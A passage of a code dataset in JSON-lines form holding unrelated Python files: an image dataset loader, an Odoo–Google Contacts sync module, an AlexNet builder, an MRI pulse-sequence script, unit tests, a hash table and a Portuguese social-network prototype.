0.5) * (1 + ((x - m) ** 2 / n)) ** ((n + 1) / 2))\n    return num / den\n","repo_name":"Mdslauddin/scistats-main","sub_path":"scistats/probability/discrete/_fisher.py","file_name":"_fisher.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38091716696","text":"import torch\nimport functools\nimport os.path as osp\nfrom PIL import Image\nfrom torch.utils.data import Dataset\n\n\ndef read_image(img_path):\n    \"\"\"Keep reading image until succeed.\n    This can avoid IOError incurred by heavy IO process.\"\"\"\n    got_img = False\n    if not osp.exists(img_path):\n        raise IOError(\"{} does not exist\".format(img_path))\n    while not got_img:\n        try:\n            img = Image.open(img_path).convert('RGB')\n            got_img = True\n        except IOError:\n            print(\"IOError incurred when reading '{}'. Will redo. Don't worry. 
Just chill.\".format(img_path))\n pass\n return img\n\n\nclass ImageDataset(Dataset):\n \"\"\"Image Person ReID Dataset\"\"\"\n def __init__(self, dataset, transform=None):\n self.dataset = dataset\n self.transform = transform\n\n def __len__(self):\n return len(self.dataset)\n\n def __getitem__(self, index):\n img_path, pid, camid, clothes_id = self.dataset[index]\n img = read_image(img_path)\n if self.transform is not None:\n img = self.transform(img)\n return img, pid, camid, clothes_id, img_path\n\n\ndef pil_loader(path):\n # open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)\n with open(path, 'rb') as f:\n with Image.open(f) as img:\n return img.convert('RGB')\n\n\ndef accimage_loader(path):\n try:\n import accimage\n return accimage.Image(path)\n except IOError:\n # Potentially a decoding problem, fall back to PIL.Image\n return pil_loader(path)\n\n\ndef get_default_image_loader():\n from torchvision import get_image_backend\n if get_image_backend() == 'accimage':\n return accimage_loader\n else:\n return pil_loader\n\n\ndef image_loader(path):\n from torchvision import get_image_backend\n if get_image_backend() == 'accimage':\n return accimage_loader(path)\n else:\n return pil_loader(path)\n","repo_name":"bar371/ReFace","sub_path":"ReIDModules/AIM_CCReID/data/dataset_loader.py","file_name":"dataset_loader.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"52"} +{"seq_id":"40476675987","text":"import logging\nimport requests\nfrom odoo import fields, models, _\nfrom odoo.exceptions import ValidationError\n\n_logger = logging.getLogger(__name__)\n\nTIMEOUT = 20\n\n\nclass ResPartner(models.Model):\n \"\"\"Inherit res_partner for integrating contacts with Google\"\"\"\n _inherit = 'res.partner'\n\n google_resource = fields.Char('Google Contact Id',\n help='Contact Unique identifier', readonly=True)\n google_etag = fields.Char(\n 'Google Etag', help='Contact Version control key', readonly=True)\n first_name = fields.Char(\n 'First Name', help='Enter the first name of the person.')\n last_name = fields.Char(\n 'Last Name', help='Enter the last name of the person.')\n\n def action_export_google_contacts(self):\n \"\"\"Export Contacts FROM Google TO ODOO\"\"\"\n current_uid = self._context.get('uid')\n user_id = self.env['res.users'].browse(current_uid)\n company_id = user_id.company_id\n partner_ids = self.env['res.partner'].sudo().browse(\n self.env.context.get('active_ids'))\n for partner in partner_ids:\n header = {\n 'Authorization':\n f'Bearer {company_id.contact_company_access_token}',\n 'Content-Type': 'application/json'\n }\n contact_payload = {\n 'names': [\n {\n 'givenName': partner.first_name or partner.name,\n 'familyName': partner.last_name or ''\n }\n ],\n 'emailAddresses': [\n {\n 'value': partner.email or '',\n 'type': 'work'\n }\n ],\n 'phoneNumbers': [\n {\n 'value': partner.phone or '',\n 'type': 'work'\n }\n ],\n 'addresses': [\n {\n 'streetAddress': partner.street or '',\n 'city': partner.city or '',\n 'region': partner.state_id.name or '',\n 'postalCode': partner.zip or '',\n 'country': partner.country_id.name or '',\n 'type': 'work'\n }\n ],\n 'organizations': [\n {\n 'name': partner.company_id.name or '',\n 'title': partner.title or '',\n 'type': 'work'\n }\n ]\n }\n if partner.google_etag:\n contact_resource_name = partner.google_resource\n contact_payload['resourceName'] = contact_resource_name\n contact_payload['etag'] = 
partner.google_etag\n url = (\n f\"https://people.googleapis.com/v1/{contact_resource_name}:updateContact?\"\n \"updatePersonFields=emailAddresses,names,phoneNumbers,\"\n \"addresses,organizations,userDefined&\"\n \"prettyPrint=false\"\n )\n response = requests.patch(url, headers=header,\n json=contact_payload)\n if response.status_code == 200:\n partner.write({\n 'google_resource': response.json().get('resourceName'),\n 'google_etag': response.json().get('etag')\n })\n _logger.info(\"Contact updated successfully!\")\n else:\n error_message = f\"Failed to update contact. Error: {response.text}\"\n raise ValidationError(error_message)\n else:\n url = 'https://people.googleapis.com/v1/people:createContact'\n result = requests.post(url, headers=header,\n json=contact_payload)\n if result.status_code == 200:\n partner.write({\n 'google_resource': result.json().get('resourceName'),\n 'google_etag': result.json().get('etag')\n })\n _logger.info(\"Contact exported successfully!\")\n else:\n error_message = f\"Failed to export contact. Error: {result.text}\"\n raise ValidationError(error_message)\n\n def action_delete_google_contact(self):\n \"\"\"Deleting a contact from Google Contacts\"\"\"\n current_uid = self._context.get('uid')\n user_id = self.env['res.users'].browse(current_uid)\n company_id = user_id.company_id\n partner_ids = self.env['res.partner'].sudo().browse(\n self.env.context.get('active_ids'))\n for partner in partner_ids:\n contact_resource_name = partner.google_resource\n if not contact_resource_name:\n _logger.warning(\n \"Partner %s does not have a Google contact resource name.\",\n partner.name)\n continue\n url = f\"https://people.googleapis.com/v1/{contact_resource_name}:deleteContact\"\n headers = {\n 'Authorization': f'Bearer {company_id.contact_company_access_token}',\n 'Content-Type': 'application/json'\n }\n response = requests.delete(url, headers=headers)\n if response.status_code == 200:\n _logger.info(\"Contact deleted successfully!\")\n partner.google_resource = ''\n partner.google_etag = ''\n partner.unlink()\n elif response.status_code == 404:\n _logger.warning(\n \"Contact not found in Google. Removing local reference.\")\n partner.google_resource = ''\n partner.google_etag = ''\n else:\n error_message = f\"Failed to delete contact. 
Error: {response.text}\"\n raise ValidationError(error_message)\n","repo_name":"CybroOdoo/CybroAddons","sub_path":"odoo_google_contact_integration/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","stars":204,"dataset":"github-code","pt":"52"} +{"seq_id":"16375981453","text":"import tensorflow\r\n\r\ndef alex_net(input_shape=(200, 200, 1), number_of_classes=3, optimizer='adam'):\r\n layers = tensorflow.keras.layers\r\n Model = tensorflow.keras.models.Model\r\n\r\n input_layer = layers.Input(input_shape)\r\n conv1 = layers.Conv2D(96, 11, strides=4, activation='relu')(input_layer)\r\n pool1 = layers.MaxPool2D(3, 2)(conv1)\r\n\r\n conv2 = layers.Conv2D(256, 5, strides=1, padding='same', activation='relu')(pool1)\r\n pool2 = layers.MaxPool2D(3, 2)(conv2)\r\n\r\n conv3 = layers.Conv2D(384, 3, strides=1, padding='same', activation='relu')(pool2)\r\n conv4 = layers.Conv2D(256, 3, strides=1, padding='same', activation='relu')(conv3)\r\n pool3 = layers.MaxPool2D(3, 2)(conv4)\r\n\r\n flattened = layers.Flatten()(pool3)\r\n dense1 = layers.Dense(4096, activation='relu')(flattened)\r\n drop1 = layers.Dropout(0.5)(dense1)\r\n dense2 = layers.Dense(4096, activation='relu')(drop1)\r\n drop2 = layers.Dropout(0.5)(dense2)\r\n\r\n preds = layers.Dense(number_of_classes, activation='softmax')(drop2)\r\n\r\n model = Model(input_layer, preds)\r\n model.compile(\r\n loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy']\r\n )\r\n\r\n return model","repo_name":"AbdulAhadKhan/fetal-biometry-detection","sub_path":"AlexNet.py","file_name":"AlexNet.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8570916945","text":"import math\n\nimport numpy as np\n\nfrom pypulseq.Sequence.sequence import Sequence\nfrom pypulseq.calc_duration import calc_duration\nfrom pypulseq.make_adc import make_adc\nfrom pypulseq.make_delay import make_delay\nfrom pypulseq.make_sinc_pulse import make_sinc_pulse\nfrom pypulseq.make_trap_pulse import make_trapezoid\nfrom pypulseq.opts import Opts\n\nseq = Sequence()\nfov = 250e-3\nNx = 256\nNy = 256\nalpha = 10\nslice_thickness = 3e-3\nTE = np.array([7.38, 9.84]) * 1e-3\nTR = 100e-3\n\nrf_spoiling_inc = 117\n\nsys = Opts(max_grad=28, grad_unit='mT/m', max_slew=150, slew_unit='T/m/s', rf_ringdown_time=20e-6, rf_dead_time=100e-6,\n adc_dead_time=10e-6)\n\nrf, gz, gzr = make_sinc_pulse(flip_angle=alpha * math.pi / 180, duration=4e-3, slice_thickness=slice_thickness,\n apodization=0.5, time_bw_product=4, system=sys)\n\ndelta_k = 1 / fov\ngx = make_trapezoid(channel='x', flat_area=Nx * delta_k, flat_time=6.4e-3, system=sys)\nadc = make_adc(num_samples=Nx, duration=gx.flat_time, delay=gx.rise_time, system=sys)\ngx_pre = make_trapezoid(channel='x', area=-gx.area / 2, duration=2e-3, system=sys)\ngz_reph = make_trapezoid(channel='z', area=-gz.area / 2, duration=2e-3, system=sys)\nphase_areas = (np.arange(Ny) - Ny / 2) * delta_k\n\ngx_spoil = make_trapezoid(channel='x', area=2 * Nx * delta_k, system=sys)\ngz_spoil = make_trapezoid(channel='z', area=4 / slice_thickness, system=sys)\n\ndelay_TE = np.ceil((TE - calc_duration(gx_pre) - gz.fall_time - gz.flat_time / 2 - calc_duration(\n gx) / 2) / seq.grad_raster_time) * seq.grad_raster_time\ndelay_TR = np.ceil((TR - calc_duration(gx_pre) - calc_duration(gz) - calc_duration(\n gx) - delay_TE) / seq.grad_raster_time) * 
seq.grad_raster_time\n\nassert np.all(delay_TR >= calc_duration(gx_spoil, gz_spoil))\n\nrf_phase = 0\nrf_inc = 0\n\nfor i in range(Ny):\n for j in range(len(TE)):\n rf.phase_offset = rf_phase / 180 * np.pi\n adc.phase_offset = rf_phase / 180 * np.pi\n rf_inc = divmod(rf_inc + rf_spoiling_inc, 360.0)[1]\n rf_phase = divmod(rf_phase + rf_inc, 360.0)[1]\n\n seq.add_block(rf, gz)\n gy_pre = make_trapezoid(channel='y', area=phase_areas[i], duration=2e-3, system=sys)\n seq.add_block(gx_pre, gy_pre, gz_reph)\n seq.add_block(make_delay(delay_TE[j]))\n seq.add_block(gx, adc)\n gy_pre.amplitude = -gy_pre.amplitude\n seq.add_block(make_delay(delay_TR[j]), gx_spoil, gy_pre, gz_spoil)\n\nreport = seq.test_report()\nprint(report)\nseq.calculate_kspace()\nseq.plot()\nseq.write('gre_pypulseq.seq')\n","repo_name":"skye789/MRI-Sequence-Programming","sub_path":"MRTwin_pulseq-exercise/code/scannerloop_libs/pypulseq/seq_examples/write_gre.py","file_name":"write_gre.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27770426112","text":"import unittest\nimport biothings_explorer.utils.common as util\n\n\nclass TestUtilsCommon(unittest.TestCase):\n\n def test_add_s_when_input_is_non_integer(self):\n res = util.add_s('kevin')\n self.assertEqual(res, '')\n \n def test_add_s_when_input_is_greater_than_one(self):\n res = util.add_s(2)\n self.assertEqual(res, 's')\n\n def test_add_s_when_input_is_less_than_or_equal_to_one(self):\n res = util.add_s(1)\n self.assertEqual(res, '')\n res = util.add_s(0)\n self.assertEqual(res, '')\n \n def test_dict2listoftuples(self):\n py_dict = {'k': 'j', 'm': 'n'}\n res = util.dict2listoftuples(py_dict)\n # self.assertListEqual([('k', 'j'), ('m', 'n')], res)\n py_dict = {}\n res = util.dict2listoftuples(py_dict)\n self.assertListEqual([], res)\n\n def test_listoftuples2dict(self):\n lst = [('k', 'j'), ('m', 'n')]\n res = util.listoftuples2dict(lst)\n self.assertDictEqual(res, {'k': 'j', 'm': 'n'})\n lst = []\n res = util.listoftuples2dict(lst)\n self.assertDictEqual(res, {})\n\n def test_unlist(self):\n py_dict = {'k': ['n'], 'm': 'q'}\n res = util.unlist(py_dict)\n self.assertDictEqual(res, {'k': 'n', 'm': 'q'})\n py_dict = {'k': ['n', 'm'], 'm': 'q'}\n res = util.unlist(py_dict)\n self.assertDictEqual(res, py_dict)\n py_dict = {'k': {'m': ['n']}, 'm': 'q'}\n res = util.unlist(py_dict)\n self.assertDictEqual(res, {'k': {'m': 'n'}, 'm': 'q'})\n py_dict = ['m']\n res = util.unlist(py_dict)\n self.assertEqual(res, 'm')\n py_dict = ['m', 'n']\n res = util.unlist(py_dict)\n self.assertEqual(res, ['m', 'n'])\n py_dict = 'm'\n res = util.unlist(py_dict)\n self.assertEqual(res, 'm')\n \n def test_find_longest_common_path(self):\n paths = ['ensembl.gene', 'ensembl.transcript']\n res = util.find_longest_common_path(paths)\n self.assertEqual(res, 'ensembl')\n paths = ['ensembl.gene', 'protein']\n res = util.find_longest_common_path(paths)\n self.assertEqual(res, '')\n paths = ['ensembl.gene', 'ensembl.transcript', 'ensembl.protein.id']\n res = util.find_longest_common_path(paths)\n self.assertEqual(res, 'ensembl')\n paths = ['ensembl.gene', 'ensembl.gid']\n res = util.find_longest_common_path(paths)\n self.assertEqual(res, 'ensembl')\n\n def test_get_dict_values(self):\n py_dict = {'m': 'n', 'k': 'm', '@type': 'k', '$input': 'q'}\n res = util.get_dict_values(py_dict)\n self.assertSetEqual(set(res), set(['n', 'm']))\n res = util.get_dict_values(py_dict, excluded_keys=[])\n 
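# The find_longest_common_path tests above pin down a dotted-path longest-
# common-prefix: compare the paths segment by segment and stop at the first
# mismatch. A minimal sketch of that behaviour follows; `common_path` is a
# hypothetical stand-in written for illustration, not the library function.
def common_path(paths):
    split = [p.split('.') for p in paths]  # dotted paths -> segment lists
    common = []
    for segments in zip(*split):
        if len(set(segments)) != 1:  # first disagreement ends the prefix
            break
        common.append(segments[0])
    return '.'.join(common)

assert common_path(['ensembl.gene', 'ensembl.transcript']) == 'ensembl'
assert common_path(['ensembl.gene', 'protein']) == ''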
self.assertSetEqual(set(res), set(['n', 'm', 'k', 'q']))\n\n def test_get_primary_id_from_equivalent_ids(self):\n equivalent_ids = {'entrez': ['1017'],\n 'ensembl': ['ENSG1234'],\n 'symbol': ['CDK7'],\n 'umls': ['C001234']}\n res = util.get_primary_id_from_equivalent_ids(equivalent_ids, 'Gene')\n self.assertEqual(res, 'entrez:1017')\n equivalent_ids = {'kk': ['123']}\n res = util.get_primary_id_from_equivalent_ids(equivalent_ids, 'Gene')\n self.assertEqual(res, 'kk:123')\n equivalent_ids = {}\n res = util.get_primary_id_from_equivalent_ids(equivalent_ids, 'Gene')\n self.assertEqual(res, '')\n\n def test_get_name_from_equivalent_ids(self):\n equivalent_ids = {'NCBIGene': ['1017'],\n 'ENSEMBL': ['ENSG1234'],\n 'SYMBOL': ['CDK7'],\n 'UMLS': ['C001234']}\n res = util.get_name_from_equivalent_ids(equivalent_ids)\n self.assertEqual(res, 'CDK7')\n equivalent_ids = {'name': ['Lung Cancer'], 'MONDO': ['MONDO:00023']}\n res = util.get_name_from_equivalent_ids(equivalent_ids)\n self.assertEqual(res, 'Lung Cancer')\n equivalent_ids = {'MONDO': ['MONDO:000123']}\n res = util.get_name_from_equivalent_ids(equivalent_ids)\n self.assertEqual(res, 'MONDO:000123')\n res = util.get_name_from_equivalent_ids({})\n self.assertEqual(res, 'unknown')\n res = util.get_name_from_equivalent_ids({}, 'kevin')\n self.assertEqual(res, 'kevin')\n\n def test_remove_prefix_flat_dict(self):\n json_doc = {'type': 'gene', \"@context\": \"http://schema.org\"}\n json_doc_prefix_removed = util.remove_prefix(json_doc, 'bts')\n self.assertDictEqual(json_doc_prefix_removed, {'type': 'gene', \"@context\": \"http://schema.org\"})\n \n def test_remove_prefix_lst_of_dicts(self):\n json_doc = {'type': [{'name': 'gene'}, {'drug': 'carol'}]}\n json_doc_prefix_removed = util.remove_prefix(json_doc, 'bts')\n self.assertDictEqual(json_doc_prefix_removed, {'type': [{'name': 'gene'},{'drug': 'carol'}]})\n\n def test_remove_prefix_int(self):\n json_doc = {'type': 1}\n json_doc_prefix_removed = util.remove_prefix(json_doc, 'bts')\n self.assertDictEqual(json_doc_prefix_removed, {'type': 1})\n \n def test_remove_prefix_non_json(self):\n _input = 'gene'\n self.assertEqual(util.remove_prefix(_input, 'bts'), 'gene')\n _input = 12\n self.assertEqual(util.remove_prefix(_input, 'bts'), _input)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"biothings/biothings_explorer_archived","sub_path":"tests/test_utils_common.py","file_name":"test_utils_common.py","file_ext":"py","file_size_in_byte":5418,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"73208289124","text":"from data_structures_and_algorithms.data_structures.linked_list.linked_list import Node, LinkedList\n\nclass HashTable:\n def __init__(self, size=1024):\n self.map = [None] * size\n self.size = size\n self.current = None\n\n def hash(self, key):\n hashed_total = 0\n for char in key:\n hashed_total += ord(char)\n return hashed_total*19 % self.size\n\n def add(self, key, info):\n hashed_key = self.hash(key)\n contained = self.contains(key)\n if self.map[hashed_key] == None:\n self.map[hashed_key] = LinkedList()\n elif contained:\n self.current.info[1] = info\n return self.map[hashed_key].add((key, info))\n\n def get(self, key):\n hashed_key = self.hash(key)\n if self.map[hashed_key]:\n contained = self.contains(key)\n if contained:\n return self.current.info[1] \n return 'Not in the table'\n\n def contains(self, key):\n hashed_key = self.hash(key)\n if self.map[hashed_key]:\n self.current = self.map[hashed_key].head \n 
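# The add() method above stores Node.info as a (key, value) tuple but then
# tries `self.current.info[1] = info`, which raises TypeError (tuples are
# immutable), and it still appends a duplicate node after an update. A hedged
# sketch of a working update path, assuming the same LinkedList/Node API;
# this is an illustrative fix, not the repo's code.
def add_fixed(self, key, info):
    hashed_key = self.hash(key)
    if self.contains(key):
        # contains() leaves self.current on the matching node; rebind the
        # whole tuple instead of mutating it, and stop before appending.
        self.current.info = (key, info)
        return
    if self.map[hashed_key] is None:
        self.map[hashed_key] = LinkedList()
    return self.map[hashed_key].add((key, info))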
while self.current:\n if self.current.info[0] == key:\n return True\n self.current = self.current.next\n return False\n\nif __name__ == \"__main__\":\n table = HashTable()\n table.add('listen','listen value')\n table.add('silent','silent value')\n print(table.hash('listen'))\n print(table.map[table.hash('listen')].head.info[1])\n print(table.map[table.hash('silent')].head.next.info)\n print(table.get('listen'))\n print(table.get('listen'))\n print(table.get('silent'))\n print(table.get('speek'))\n print(table.contains('listen'))\n print(table.contains('silent'))\n print(table.contains('speek'))\n","repo_name":"Basma23/data-structures-and-algorithms-python","sub_path":"data_structures_and_algorithms/data_structures/hashtable/hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43368646572","text":"comunidades='comunidades.csv'\r\nlog='login.csv'\r\ncad='cadastro.csv'\r\nimport csv\r\ndef inicio():\r\n print('\\033[0;36m-\\033[m'*40)\r\n print('\\033[0;34mBem-vinda ao E-stuário\\033[m'.center(50))\r\n print('\\033[0;36m-\\033[m'*40)\r\n while True:\r\n resp_cad = input('Já possui Cadastro? [Sim/Não] \\n').upper()\r\n if resp_cad == 'SIM':\r\n login()\r\n feed_sim()\r\n eventos()\r\n comunidade()\r\n break\r\n elif resp_cad == 'NÃO' or resp_cad == 'NAO':\r\n cadastro()\r\n feed_nao()\r\n eventos()\r\n comunidade()\r\n break\r\n else:\r\n print('Digite uma resposta válida.')\r\n\r\ndef login():\r\n while True:\r\n email = input('Digite o seu email: ')\r\n senha = input('Digite sua senha: ')\r\n arquivo = open('cadastro.csv', 'r')\r\n linhas = arquivo.readlines()\r\n for linha in linhas:\r\n dados = linha.strip().split(',')\r\n if dados[2] == email and dados[3] == senha:\r\n print('\\033[4mLogin bem sucedido!\\033[m')\r\n arquivo.close()\r\n return\r\n print('\\033[4mEmail ou senha incorretos.\\033[m \\033[4mTente novamente.\\033[m')\r\n arquivo.close()\r\n\r\ndef cadastro():\r\n nome = ''\r\n sobrenome = ''\r\n email = ''\r\n senha = ''\r\n idd = ''\r\n while True:\r\n perfil = input('Seu perfil será pessoal ou uma comunidade? 
').upper()\r\n if perfil == 'PESSOAL':\r\n while not nome:\r\n nome = input('Digite seu nome: ')\r\n while not sobrenome:\r\n sobrenome = input('Digite seu sobrenome: ')\r\n while not email:\r\n email = input('Digite o seu email: ')\r\n while not senha:\r\n senha = input('Crie sua senha: ')\r\n while not idd:\r\n idd = input('Digite a data do seu nascimento [DD/MM/AAAA]: ')\r\n while True:\r\n ocupacao = input('Qual sua ocupação: \\n-\\033[1m[1]\\033[m Estudante \\n-\\033[1m[2]\\033[m Profissional'\r\n ' \\n-\\033[1m[3]\\033[m Professor(a) \\n-\\033[1m[4]\\033[m Sem ocupação\\n--> ')\r\n if ocupacao not in ('1', '2', '3', '4'):\r\n print('Digite uma resposta válida.')\r\n else:\r\n break\r\n arquivo = open('cadastro.csv', 'a')\r\n arquivo.write(f'{nome},{sobrenome},{email},{senha},{idd},{ocupacao}\\n')\r\n arquivo.close()\r\n print('\\033[0;34mParabéns, você concluiu seu cadastro!\\033[m')\r\n break\r\n elif perfil == 'COMUNIDADE':\r\n nome = input('Digite o nome da comunidade: ')\r\n email = input('Digite o seu email: ')\r\n senha = input('Crie sua senha: ')\r\n arquivo = open('cadastro.csv', 'a')\r\n arquivo.write(f'{nome},{email},{senha}\\n')\r\n arquivo.close()\r\n print('\\033[0;34mParabéns, você concluiu o cadastro da comunidade!\\033[m')\r\n break\r\n else:\r\n print('Digite uma resposta válida.')\r\n\r\ndef feed_sim():\r\n print('\\033[0;36m-\\033[m'*40)\r\n print()\r\n print('\\033[4;34mHome\\033[m'.center(50))\r\n print()\r\n print('\\033[0;36m-\\033[m'*40)\r\n post()\r\n print('\\033[0;36m-\\033[m'*40)\r\n print()\r\n print()\r\n print('\\033[4;34mPublicação\\033[m'.center(50))\r\n print('\\n\\033[1;34m|\\033[mCurtir\\033[1;34m|\\033[mComentar\\033[1;34m|\\033[mCompartilhar\\033[1;34m|\\033[mRepublicar\\033[1;34m|\\033[m')\r\n print('\\033[0;36m-\\033[m'*40)\r\n print()\r\n\r\ndef feed_nao():\r\n print('\\033[0;36m-\\033[m'*40)\r\n print()\r\n print('\\033[4;34mHome\\033[m'.center(50))\r\n print()\r\n print('\\033[0;36m-\\033[m'*40)\r\n post()\r\n print('\\033[1m>Siga mais perfis para ver publicações<\\033[m')\r\n print()\r\n print('\\033[4;36mSugestões para seguir:\\033[m')\r\n print('\\033[0;34m*Perfis*\\n*Perfis*\\n*Perfis*\\033[m')\r\n print()\r\n\r\n\r\ndef post():\r\n criacao = ''\r\n while criacao not in ('SIM', 'NAO', 'NÃO'):\r\n criacao = input('Deseja publicar algo? [Sim/Não]\\n').strip().upper()\r\n if criacao == 'SIM':\r\n legenda = ''\r\n while not legenda:\r\n legenda = input('No que você está pensando?\\n')\r\n arquivo = input('Deseja adicionar alguma mídia? [Sim/Não]\\n').strip().upper()\r\n if arquivo == 'SIM':\r\n pub = f'\\033[1;34m-->\\033[m{legenda}\\n\\033[1;34m~\\033[mMídia\\033[1;34m~\\033[m'\r\n print('\\033[0;36m-\\033[m' * 40)\r\n print()\r\n print(pub)\r\n print(\r\n '\\n\\033[1;34m|\\033[mCurtir\\033[1;34m|\\033[mComentar\\033[1;34m|\\033[mCompartilhar\\033[1;34m|\\033[mRepublicar\\033[1;34m|\\033[m')\r\n print('\\033[0;36m-\\033[m' * 40)\r\n elif arquivo == 'NÃO' or arquivo == 'NAO':\r\n print('\\033[0;36m-\\033[m' * 40)\r\n print()\r\n pub = legenda\r\n print(f'\\033[1;34m-->\\033[m{pub}')\r\n print()\r\n print('\\033[0;36m-\\033[m' * 40)\r\n\r\ndef eventos():\r\n try:\r\n print('\\033[4mEventos disponíveis:\\033[m\\n')\r\n print(\"\\033[1m[1]\\033[m-Recife,PE\\n\\033[1m[2]\\033[m-Olinda,PE\\n\\033[1m[3]\\033[m-Jaboatão dos Guararapes,PE\\n\"\r\n \"\\033[1m[4]\\033[m-Caruaru,PE\\n\\033[1m[5]\\033[m-Buenos Aires,PE\")\r\n localizacao = int(input(\"-Qual sua localização? 
\"))\r\n eventos_recife = [\"Evento 1\", \"Evento 2\", \"Evento 3\"]\r\n eventos_olinda = [\"Evento 1\", \"Evento 2\", \"Evento 3\"]\r\n eventos_jaboatao = [\"Evento 1\", \"Evento 2\", \"Evento 3\"]\r\n eventos_caruaru = [\"Evento 1\", \"Evento 2\", \"Evento 3\"]\r\n eventos_buenos_aires = [\"Evento 1\", \"Evento 2\", \"Evento 3\"]\r\n\r\n if localizacao == 1:\r\n print(\"\\n\\033[1;34mEventos em Recife,PE:\\033[m\")\r\n cont = 0\r\n for evento in eventos_recife:\r\n cont += 1\r\n print(f\"\\033[1m[{cont}]\\033[m\", evento)\r\n\r\n elif localizacao == 2:\r\n print(\"\\n\\033[1;34mEventos em Olinda,PE:\\033[m\")\r\n cont = 0\r\n for evento in eventos_olinda:\r\n cont += 1\r\n print(f\"\\033[1m[{cont}]\\033[m\", evento)\r\n\r\n elif localizacao == 3:\r\n print(\"\\n\\033[1;34mEventos em Jaboatão dos Guararapes,PE:\\033[m\")\r\n cont = 0\r\n for evento in eventos_jaboatao:\r\n cont += 1\r\n print(f\"\\033[1m[{cont}]\\033[m\", evento)\r\n\r\n elif localizacao == 4:\r\n print(\"\\n\\033[1;34mEventos em Caruaru,PE:\\033[m\")\r\n cont = 0\r\n for evento in eventos_caruaru:\r\n cont += 1\r\n print(f\"\\033[1m[{cont}]\\033[m\", evento)\r\n\r\n elif localizacao == 5:\r\n print(\"\\n\\033[1;34mEventos em Buenos Aires,PE:\\033[m\")\r\n cont = 0\r\n for evento in eventos_buenos_aires:\r\n cont += 1\r\n print(f\"\\033[1m[{cont}]\\033[m\", evento)\r\n\r\n else:\r\n print(\"Opção inválida!\")\r\n\r\n escolha = int(input(\"Digite o número do evento escolhido: \"))\r\n if localizacao == 1 and 1 <= escolha <= len(eventos_recife):\r\n evento_escolhido = eventos_recife[escolha - 1]\r\n print(\"Você escolheu o evento:\", evento_escolhido)\r\n print('\\033[0;36m-\\033[m' * 40)\r\n print(\"\\033[0;34m*INFORMAÇÕES DO EVENTO*\\033[m\".center(50))\r\n print('\\033[0;36m-\\033[m' * 40)\r\n\r\n elif localizacao == 2 and 1 <= escolha <= len(eventos_olinda):\r\n evento_escolhido = eventos_olinda[escolha - 1]\r\n print(\"Você escolheu o evento:\", evento_escolhido)\r\n print('\\033[0;36m-\\033[m' * 40)\r\n print(\"\\033[0;34m*INFORMAÇÕES DO EVENTO*\\033[m\".center(50))\r\n print('\\033[0;36m-\\033[m' * 40)\r\n\r\n elif localizacao == 3 and 1 <= escolha <= len(eventos_jaboatao):\r\n evento_escolhido = eventos_jaboatao[escolha - 1]\r\n print(\"Você escolheu o evento:\", evento_escolhido)\r\n print('\\033[0;36m-\\033[m' * 40)\r\n print(\"\\033[0;34m*INFORMAÇÕES DO EVENTO*\\033[m\".center(50))\r\n print('\\033[0;36m-\\033[m' * 40)\r\n\r\n elif localizacao == 4 and 1 <= escolha <= len(eventos_caruaru):\r\n evento_escolhido = eventos_caruaru[escolha - 1]\r\n print(\"Você escolheu o evento:\", evento_escolhido)\r\n print('\\033[0;36m-\\033[m' * 40)\r\n print(\"\\033[0;34m*INFORMAÇÕES DO EVENTO*\\033[m\".center(50))\r\n print('\\033[0;36m-\\033[m' * 40)\r\n\r\n elif localizacao == 5 and 1 <= escolha <= len(eventos_buenos_aires):\r\n evento_escolhido = eventos_buenos_aires[escolha - 1]\r\n print(\"Você escolheu o evento:\", evento_escolhido)\r\n print('\\033[0;36m-\\033[m' * 40)\r\n print(\"\\033[0;34m*INFORMAÇÕES DO EVENTO*\\033[m\".center(50))\r\n print('\\033[0;36m-\\033[m' * 40)\r\n\r\n else:\r\n print(\"Opção inválida!\")\r\n except ValueError:\r\n print(\"Digite o número correspondente à sua localização.\")\r\n\r\ndef carregar_dados():\r\n armazenar_dados = {}\r\n try:\r\n with open('comunidades.csv', 'r') as arquivo:\r\n leitor = csv.reader(arquivo)\r\n next(leitor)\r\n for linha in leitor:\r\n comunidade = linha[0]\r\n quantidade_pessoas = int(linha[1])\r\n membros = linha[2:] if len(linha) > 2 else []\r\n 
armazenar_dados[comunidade] = {\r\n 'Quantidade de Pessoas': quantidade_pessoas, 'Membros': membros}\r\n arquivo.close()\r\n except FileNotFoundError:\r\n pass\r\n return armazenar_dados\r\n\r\ndef salvar_dados(armazenar_dados):\r\n with open('comunidades.csv', 'w', newline='') as arquivo:\r\n escrita = csv.writer(arquivo)\r\n escrita.writerow(['Comunidade', 'Quantidade de Pessoas', 'Membros'])\r\n for comunidade, info in armazenar_dados.items():\r\n quantidade_pessoas = info['Quantidade de Pessoas']\r\n membros = info['Membros']\r\n escrita.writerow([comunidade, quantidade_pessoas] + membros)\r\n arquivo.close()\r\n\r\n\r\ndef exibir_menu(armazenar_dados):\r\n print('\\n\\033[1;34m-Comunidades:\\033[m')\r\n linha = 1\r\n for comunidade in armazenar_dados:\r\n print(f'[{linha}] - {comunidade}')\r\n linha += 1\r\n print(f'\\033[1m[{linha}]\\033[m- Criar comunidade')\r\n print(f'\\033[1m[{linha+1}]\\033[m- Visualizar membros')\r\n\r\n\r\ndef visualizar_membros(armazenar_dados):\r\n comunidade_escolhida = int(input('Digite o número da comunidade: '))\r\n comunidades = list(armazenar_dados.keys())\r\n if 1 <= comunidade_escolhida <= len(comunidades):\r\n comunidade = comunidades[comunidade_escolhida - 1]\r\n membros = armazenar_dados[comunidade]['Membros']\r\n print(f'Membros da comunidade {comunidade}:')\r\n for membro in membros:\r\n print(membro)\r\n 